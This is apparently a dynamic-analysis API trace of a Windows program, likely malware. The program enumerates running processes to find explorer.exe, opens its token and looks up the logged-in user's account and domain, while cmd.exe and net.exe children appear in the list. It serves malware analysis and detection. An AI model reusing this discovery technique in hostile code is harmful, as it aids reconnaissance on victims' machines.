	[0255.829] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff930
	[0255.829] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fffa8
	[0255.829] lstrcpynW (in: lpString1=0x22fffa8, lpString2="1/", iMaxLength=2 | out: lpString1="1") returned="1"
	[0255.829] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa50) returned 1
	[0255.829] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fff90) returned 1
	[0255.829] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff930) returned 1
	[0255.829] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa20) returned 1
	[0255.829] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x668
	[0255.832] Process32FirstW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0255.834] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0255.834] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0255.835] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0255.836] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0255.837] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0255.837] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0255.838] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0255.838] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0255.839] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0255.839] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0255.840] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0255.840] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0255.841] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0255.841] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0255.842] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0255.842] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0255.843] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0255.843] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0255.844] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0255.844] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.845] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0255.845] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.846] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0255.846] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.846] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0255.846] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.847] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0255.847] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.848] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0255.848] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.849] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0255.850] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.850] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0255.850] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0255.851] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0255.851] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.852] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0255.852] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0255.853] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0255.853] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0255.854] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0255.854] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.855] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0255.855] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0255.855] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0255.856] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0255.856] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0255.856] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0255.857] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0255.857] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0255.858] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0255.858] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0255.859] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0255.859] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0255.860] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0255.860] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0255.861] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0255.861] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0255.862] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0255.862] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0255.862] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0255.862] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0255.863] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0255.864] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0255.865] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0255.865] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0255.865] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0255.865] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0255.866] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0255.866] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0255.867] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0255.867] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0255.868] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0255.868] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0255.869] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0255.869] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0255.870] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0255.870] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0255.871] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0255.871] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0255.872] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0255.872] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0255.873] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0255.873] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0255.873] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0255.874] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0255.874] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0255.874] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0255.875] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0255.875] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0255.876] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0255.876] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.877] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0255.877] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.878] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0255.878] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.879] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0255.879] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.880] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0255.880] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0255.880] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0255.880] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.881] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0255.881] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.882] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0255.882] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0255.883] lstrcmpW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1
	[0255.883] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0255.884] lstrcmpW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1
	[0255.884] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0255.885] lstrcmpW (lpString1="explorer.exe", lpString2="net.exe") returned -1
	[0255.885] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.886] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0255.886] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0255.887] lstrcmpW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1
	[0255.887] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0255.888] lstrcmpW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1
	[0255.888] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0255.889] lstrcmpW (lpString1="explorer.exe", lpString2="net.exe") returned -1
	[0255.889] Process32NextW (in: hSnapshot=0x668, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0255.890] CloseHandle (hObject=0x668) returned 1
	[0255.890] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa20
	[0255.890] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff930
	[0255.890] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2807570
	[0255.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x668
	[0255.890] OpenProcessToken (in: ProcessHandle=0x668, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x700) returned 1
	[0255.890] GetTokenInformation (in: TokenHandle=0x700, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0255.890] GetLastError () returned 0x7a
	[0255.890] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6490
	[0255.890] GetTokenInformation (in: TokenHandle=0x700, TokenInformationClass=0x1, TokenInformation=0x22a6490, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x22a6490, ReturnLength=0x128c98) returned 1
	[0255.890] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a6498*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0255.891] CloseHandle (hObject=0x700) returned 1
	[0255.891] CloseHandle (hObject=0x668) returned 1
	[0255.891] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2f10
